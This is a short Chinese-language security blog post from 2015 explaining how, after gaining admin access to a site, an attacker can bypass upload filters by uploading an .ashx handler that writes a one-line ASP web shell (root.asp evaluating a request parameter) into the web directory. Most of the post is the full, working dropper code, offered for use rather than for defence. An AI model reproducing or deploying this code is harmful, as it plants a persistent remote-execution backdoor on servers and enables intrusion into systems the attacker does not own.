MENU

突破上传,利用ashx生成一句话

June 13, 2015 • Security

在拿到后台之后,可能上传过滤比较严格,但是大多数管理员忘记了过滤ashx文件,这样就可以利用他来写一句话了。

将代码保存为ashx文件,访问他之后,就会在当前目录下生成root.asp了

<%@ WebHandler Language="C#" class="Handler" %>

using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {

public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";

StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%eval request("123")%>");
file1.Flush();
file1.Close();

}

public bool IsReusable {
get {
return false;
}
}

}
Archives QR Code
QR Code for this page
Tipping QR Code